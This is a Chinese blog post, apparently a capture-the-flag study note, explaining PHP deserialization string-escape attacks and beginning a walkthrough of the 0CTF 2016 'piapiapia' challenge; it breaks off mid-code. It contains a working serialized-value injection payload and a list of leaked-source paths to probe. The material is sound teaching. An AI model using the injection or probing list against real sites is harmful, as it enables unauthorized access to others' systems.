<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"su29029.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="发现最近自己刷题比较多，但是缺少总结，感觉这样很有可能刷了一堆题结果知识点都没记住，效率太低。于是决定每天少刷题多总结。 今天总结一下php反序列化的一个问题。来源是2016年0CTF的一道题。 0x00 首先看一下什么是反序列化php反序列化，简言之就是将转换为字节序列的对象数据恢复为对象的过程。具体基础知识不再多讲，具体可以参考我的这篇文章https:&#x2F;&#x2F;su29029.github.io&#x2F;2">
<meta property="og:type" content="article">
<meta property="og:title" content="php反序列化尾部字符串逃逸学习">
<meta property="og:url" content="https://su29029.github.io/2020/08/28/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%BE%E9%83%A8%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="发现最近自己刷题比较多，但是缺少总结，感觉这样很有可能刷了一堆题结果知识点都没记住，效率太低。于是决定每天少刷题多总结。 今天总结一下php反序列化的一个问题。来源是2016年0CTF的一道题。 0x00 首先看一下什么是反序列化php反序列化，简言之就是将转换为字节序列的对象数据恢复为对象的过程。具体基础知识不再多讲，具体可以参考我的这篇文章https:&#x2F;&#x2F;su29029.github.io&#x2F;2">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://su29029.github.io/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习1.jpg">
<meta property="og:image" content="https://su29029.github.io/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习2.jpg">
<meta property="og:image" content="https://su29029.github.io/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习3.jpg">
<meta property="article:published_time" content="2020-08-28T02:35:50.000Z">
<meta property="article:modified_time" content="2020-08-28T02:58:06.054Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="web安全">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://su29029.github.io/assets/img/php反序列化尾部字符串逃逸学习/php反序列化尾部字符串逃逸学习1.jpg">

<link rel="canonical" href="https://su29029.github.io/2020/08/28/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%BE%E9%83%A8%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8%E5%AD%A6%E4%B9%A0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>php反序列化尾部字符串逃逸学习 | Hexo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Hexo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about" rel="section"><i class="fa fa-fw fa-user"></i>About</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags" rel="section"><i class="fa fa-fw fa-tags"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories" rel="section"><i class="fa fa-fw fa-th"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives" rel="section"><i class="fa fa-fw fa-archive"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="https://su29029.github.io/2020/08/28/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%B0%BE%E9%83%A8%E5%AD%97%E7%AC%A6%E4%B8%B2%E9%80%83%E9%80%B8%E5%AD%A6%E4%B9%A0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Hexo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          php反序列化尾部字符串逃逸学习
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>
              

              <time title="Created: 2020-08-28 10:35:50 / Modified: 10:58:06" itemprop="dateCreated datePublished" datetime="2020-08-28T10:35:50+08:00">2020-08-28</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
                  , 
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/web%E5%AE%89%E5%85%A8/" itemprop="url" rel="index"><span itemprop="name">web安全</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>发现最近自己刷题比较多，但是缺少总结，感觉这样很有可能刷了一堆题结果知识点都没记住，效率太低。于是决定每天少刷题多总结。</p>
<p>今天总结一下php反序列化的一个问题。来源是2016年0CTF的一道题。</p>
<h2 id="0x00-首先看一下什么是反序列化"><a href="#0x00-首先看一下什么是反序列化" class="headerlink" title="0x00 首先看一下什么是反序列化"></a>0x00 首先看一下什么是反序列化</h2><p>php反序列化，简言之就是将转换为字节序列的对象数据恢复为对象的过程。具体基础知识不再多讲，具体可以参考我的这篇文章<a href="https://su29029.github.io/2020/04/04/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93.html">https://su29029.github.io/2020/04/04/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%80%BB%E7%BB%93.html</a></p>
<h2 id="0x01-php反序列化尾部字符串逃逸"><a href="#0x01-php反序列化尾部字符串逃逸" class="headerlink" title="0x01 php反序列化尾部字符串逃逸"></a>0x01 php反序列化尾部字符串逃逸</h2><p>我们看下面的代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $username = <span class="string">&quot;su29029&quot;</span>;</span><br><span class="line">    $password = <span class="string">&quot;12345&quot;</span>;</span><br><span class="line">    $user = <span class="keyword">array</span>($username, $password);</span><br><span class="line">    $serial = serialize($user);</span><br><span class="line">    var_dump($serial);</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&quot;\n&quot;</span>;</span><br><span class="line">	var_dump(unserialize($serial));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">string(40) <span class="string">&quot;a:2:&#123;i:0;s:7:&quot;</span>su29029<span class="string">&quot;;i:1;s:5:&quot;</span>12345<span class="string">&quot;;&#125;&quot;</span></span><br><span class="line"></span><br><span class="line">array(2) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  string(7) <span class="string">&quot;su29029&quot;</span></span><br><span class="line">  [1]=&gt;</span><br><span class="line">  string(5) <span class="string">&quot;12345&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>反序列化正常返回了一个array对象。如果我们此时在<code>;&#125;</code>后面再加一些内容，例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">&#x27;a:2:&#123;i:0;s:7:&quot;su29029&quot;;i:1;s:5:&quot;12345&quot;;&#125;s:5:&quot;admin&quot;;s:5:&quot;hhh&quot;;&#125;&#x27;</span>;</span><br><span class="line">var_dump(unserialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>执行结果如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span>(<span class="number">2</span>) &#123;</span><br><span class="line">  [<span class="number">0</span>]=&gt;</span><br><span class="line">  <span class="keyword">string</span>(<span class="number">7</span>) <span class="string">&quot;su29029&quot;</span></span><br><span class="line">  [<span class="number">1</span>]=&gt;</span><br><span class="line">  <span class="keyword">string</span>(<span class="number">5</span>) <span class="string">&quot;12345&quot;</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>我们发现<code>;&#125;</code>后面的内容被忽略掉了。php底层在作反序列化的时候会根据<code>;</code>来判断字段的分割，以<code>&#125;</code>作为结尾（字符串内的除外），并且会根据长度判断内容。故上面那个例子中<code>&#125;</code>后的内容被忽略掉了。</p>
<p>如果我们设置了一个非正常长度的字节序列呢？例如我们把上面例子中代表字符串长度的数字改一下，会发生什么呢？</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$a = <span class="string">&#x27;a:2:&#123;i:0;s:9:&quot;su29029&quot;;i:1;s:5:&quot;12345&quot;;&#125;s:5:&quot;admin&quot;;s:5:&quot;hhh&quot;;&#125;&#x27;</span>;</span><br><span class="line">var_dump(unserialize($a));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>执行结果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">PHP Notice:  unserialize(): Error at offset 19 of 63 bytes in &#x2F;home&#x2F;php&#x2F;4.php on line 3</span><br><span class="line">bool(false)</span><br></pre></td></tr></table></figure>

<p>我们发现报错了，而且只要标记的字符串长度不等于字符串的真实长度就会报错。</p>
<p>ok，有了以上前置内容，我们来看一个例子，我们需要想办法拿到flag。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">filter</span>(<span class="params">$string</span>)</span>&#123;</span><br><span class="line">        <span class="keyword">return</span> str_replace(<span class="string">&#x27;m&#x27;</span>,<span class="string">&#x27;aa&#x27;</span>,$string);</span><br><span class="line">&#125;</span><br><span class="line">        $username=$argv[<span class="number">1</span>];<span class="comment">//read from cmd line  e.g. php 1.php &quot;abc&quot;</span></span><br><span class="line">        $password=<span class="string">&quot;12345&quot;</span>;</span><br><span class="line">        $user = <span class="keyword">array</span>($username, $password);</span><br><span class="line">        $serial = serialize($user);</span><br><span class="line">        var_dump($serial);</span><br><span class="line">        $filt = filter($serial);</span><br><span class="line">        var_dump($filt);</span><br><span class="line">        var_dump(unserialize($filt));</span><br><span class="line">        $res = unserialize($filt);</span><br><span class="line">        <span class="keyword">if</span> ($res[<span class="number">1</span>] === <span class="string">&quot;000000&quot;</span>)&#123; <span class="comment">//$res[1] is password.</span></span><br><span class="line">                <span class="keyword">echo</span> $flag;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="string">&quot;failed.&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>我们先随便输入一个字符串：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php 1.php <span class="string">&quot;su29029&quot;</span></span><br></pre></td></tr></table></figure>

<p>执行结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">string(40) <span class="string">&quot;a:2:&#123;i:0;s:7:&quot;</span>su29029<span class="string">&quot;;i:1;s:5:&quot;</span>12345<span class="string">&quot;;&#125;&quot;</span></span><br><span class="line">string(40) <span class="string">&quot;a:2:&#123;i:0;s:7:&quot;</span>su29029<span class="string">&quot;;i:1;s:5:&quot;</span>12345<span class="string">&quot;;&#125;&quot;</span></span><br><span class="line">array(2) &#123;</span><br><span class="line">  [0]=&gt;</span><br><span class="line">  string(7) <span class="string">&quot;su29029&quot;</span></span><br><span class="line">  [1]=&gt;</span><br><span class="line">  string(5) <span class="string">&quot;12345&quot;</span></span><br><span class="line">&#125;</span><br><span class="line">failed.</span><br></pre></td></tr></table></figure>

<p>我们发现反序列化成功。如果我们输入一个会被替换的字符串则会报错：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php 1.php <span class="string">&quot;su29029mmmm&quot;</span></span><br></pre></td></tr></table></figure>

<p>执行结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">string(45) <span class="string">&quot;a:2:&#123;i:0;s:11:&quot;</span>su29029mmmm<span class="string">&quot;;i:1;s:5:&quot;</span>12345<span class="string">&quot;;&#125;&quot;</span></span><br><span class="line">string(49) <span class="string">&quot;a:2:&#123;i:0;s:11:&quot;</span>su29029aaaaaaaa<span class="string">&quot;;i:1;s:5:&quot;</span>12345<span class="string">&quot;;&#125;&quot;</span></span><br><span class="line">PHP Notice:  unserialize(): Error at offset 26 of 49 bytes <span class="keyword">in</span> /home/php/1.php on line 13</span><br><span class="line">bool(<span class="literal">false</span>)</span><br><span class="line">PHP Notice:  unserialize(): Error at offset 26 of 49 bytes <span class="keyword">in</span> /home/php/1.php on line 14</span><br><span class="line">PHP Notice:  Trying to access array offset on value of <span class="built_in">type</span> bool <span class="keyword">in</span> /home/php/1.php on line 15</span><br><span class="line">failed.</span><br></pre></td></tr></table></figure>

<p>我们注意到一个细节，被替换后的是序列化后的字符串，替换后字符串边长，但是字符串长度没有变化，s值依然是11，所以报错了。</p>
<p>我们现在换个输入，发现了一些特殊的结果：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php 1.php <span class="string">&quot;su29029mmm\&quot;;&#125;&quot;</span></span><br></pre></td></tr></table></figure>

<p>执行结果有了一些变化：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">string(47) <span class="string">&quot;a:2:&#123;i:0;s:13:&quot;</span>su29029mmm<span class="string">&quot;;&#125;&quot;</span>;i:1;s:5:<span class="string">&quot;12345&quot;</span>;&#125;<span class="string">&quot;</span></span><br><span class="line"><span class="string">string(50) &quot;</span>a:2:&#123;i:0;s:13:<span class="string">&quot;su29029aaaaaa&quot;</span>;&#125;<span class="string">&quot;;i:1;s:5:&quot;</span>12345<span class="string">&quot;;&#125;&quot;</span></span><br><span class="line">PHP Notice:  unserialize(): Unexpected end of serialized data <span class="keyword">in</span> /home/php/1.php on line 13</span><br><span class="line">PHP Notice:  unserialize(): Error at offset 30 of 50 bytes <span class="keyword">in</span> /home/php/1.php on line 13</span><br><span class="line">bool(<span class="literal">false</span>)</span><br><span class="line">PHP Notice:  unserialize(): Unexpected end of serialized data <span class="keyword">in</span> /home/php/1.php on line 14</span><br><span class="line">PHP Notice:  unserialize(): Error at offset 30 of 50 bytes <span class="keyword">in</span> /home/php/1.php on line 14</span><br><span class="line">PHP Notice:  Trying to access array offset on value of <span class="built_in">type</span> bool <span class="keyword">in</span> /home/php/1.php on line 15</span><br><span class="line">failed.</span><br></pre></td></tr></table></figure>

<p>我们发现多了<code>PHP Notice:  unserialize(): Unexpected end of serialized data in /home/php/1.php on line 13</code>，这是为什么呢？我们看替换后的序列化前后的字符串，<code>su29029mmm&quot;;&#125;</code>的长度是13位，而被替换后的字符串<code>su29029aaaaaa</code>也是13位，后面的<code>&quot;;&#125;</code>将字符串闭合了，导致后面的内容失效，反序列化提前结束，而前面的<code>a:2</code>却表明数组长度为2，所以提示“非预期的序列化数据结尾”。</p>
<p>那么这个时候我们就可以想一些“歪招”了，我们构造如下payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php <span class="number">1.</span>php <span class="string">&quot;su29029mmmmmmmmmmmmmmmmmmmm\&quot;;i:1;s:6:\&quot;000000\&quot;;&#125;&quot;</span></span><br></pre></td></tr></table></figure>

<p>我们惊喜的发现成功输出了flag：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">string(81) &quot;a:2:&#123;i:0;s:47:&quot;su29029mmmmmmmmmmmmmmmmmmmm&quot;;i:1;s:6:&quot;000000&quot;;&#125;&quot;;i:1;s:5:&quot;12345&quot;;&#125;&quot;</span><br><span class="line">string(101) &quot;a:2:&#123;i:0;s:47:&quot;su29029aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&quot;;i:1;s:6:&quot;000000&quot;;&#125;&quot;;i:1;s:5:&quot;12345&quot;;&#125;&quot;</span><br><span class="line">array(2) &#123;</span><br><span class="line">  [0]&#x3D;&gt;</span><br><span class="line">  string(47) &quot;su29029aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&quot;</span><br><span class="line">  [1]&#x3D;&gt;</span><br><span class="line">  string(6) &quot;000000&quot;</span><br><span class="line">&#125;</span><br><span class="line">flag&#123;123456&#125;</span><br></pre></td></tr></table></figure>

<p>根据上一个输入，我们发现原理相同，通过<code>&quot;;&#125;</code>闭合序列化字符串，并且巧妙利用替换操作使得替换后的<code>&quot;</code>前的字符串长度刚好等于替换前的全部字符串长度，从而成功的让<code>password</code>变成了<code>000000</code>。</p>
<h2 id="0x02-0CTF-2016-piapiapia-解题思路"><a href="#0x02-0CTF-2016-piapiapia-解题思路" class="headerlink" title="0x02 [0CTF 2016]piapiapia 解题思路"></a>0x02 [0CTF 2016]piapiapia 解题思路</h2><p>首先拿道题是个登录界面，随意输入一下发现无果，f12发现也没有提示，故尝试一些敏感文件。后来发现存在源码泄露<code>www.zip</code>。</p>
<blockquote>
<p>这里简单总结一些敏感目录，拿到题发现没有提示的时候可以尝试访问一下，说不定有意外收获。</p>
<p>/<a target="_blank" rel="noopener" href="http://www.zip/">www.zip</a> /html.zip /.git/ /.svn/ /.index.php.swp /index.php.bak /robots.txt /index.phps……</p>
<p>当然还有一些不常见的，一般都会给提示[只是一般…这个不好说]</p>
</blockquote>
<p>拿到<code>www.zip</code>发现了5个文件，逐一查看：</p>
<p>​    index.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">	require_once(&#39;class.php&#39;);</span><br><span class="line">	if($_SESSION[&#39;username&#39;]) &#123;</span><br><span class="line">		header(&#39;Location: profile.php&#39;);</span><br><span class="line">		exit;</span><br><span class="line">	&#125;</span><br><span class="line">	if($_POST[&#39;username&#39;] &amp;&amp; $_POST[&#39;password&#39;]) &#123;</span><br><span class="line">		$username &#x3D; $_POST[&#39;username&#39;];</span><br><span class="line">		$password &#x3D; $_POST[&#39;password&#39;];</span><br><span class="line"></span><br><span class="line">		if(strlen($username) &lt; 3 or strlen($username) &gt; 16) </span><br><span class="line">			die(&#39;Invalid user name&#39;);</span><br><span class="line"></span><br><span class="line">		if(strlen($password) &lt; 3 or strlen($password) &gt; 16) </span><br><span class="line">			die(&#39;Invalid password&#39;);</span><br><span class="line"></span><br><span class="line">		if($user-&gt;login($username, $password)) &#123;</span><br><span class="line">			$_SESSION[&#39;username&#39;] &#x3D; $username;</span><br><span class="line">			header(&#39;Location: profile.php&#39;);</span><br><span class="line">			exit;	</span><br><span class="line">		&#125;</span><br><span class="line">		else &#123;</span><br><span class="line">			die(&#39;Invalid user name or password&#39;);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	else &#123;</span><br><span class="line">?&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">......[省略html代码]</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line">&lt;?php</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>​    class.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span>(<span class="string">&#x27;config.php&#x27;</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">user</span> <span class="keyword">extends</span> <span class="title">mysql</span></span>&#123;</span><br><span class="line">	<span class="keyword">private</span> $table = <span class="string">&#x27;users&#x27;</span>;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">is_exists</span>(<span class="params">$username</span>) </span>&#123;</span><br><span class="line">		$username = <span class="built_in">parent</span>::filter($username);</span><br><span class="line"></span><br><span class="line">		$where = <span class="string">&quot;username = &#x27;$username&#x27;&quot;</span>;</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">parent</span>::select(<span class="keyword">$this</span>-&gt;table, $where);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">register</span>(<span class="params">$username, $password</span>) </span>&#123;</span><br><span class="line">		$username = <span class="built_in">parent</span>::filter($username);</span><br><span class="line">		$password = <span class="built_in">parent</span>::filter($password);</span><br><span class="line"></span><br><span class="line">		$key_list = <span class="keyword">Array</span>(<span class="string">&#x27;username&#x27;</span>, <span class="string">&#x27;password&#x27;</span>);</span><br><span class="line">		$value_list = <span class="keyword">Array</span>($username, md5($password));</span><br><span class="line">		<span class="keyword">return</span> <span class="built_in">parent</span>::insert(<span class="keyword">$this</span>-&gt;table, $key_list, $value_list);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">login</span>(<span class="params">$username, $password</span>) </span>&#123;</span><br><span class="line">		$username = <span class="built_in">parent</span>::filter($username);</span><br><span class="line">		$password = <span 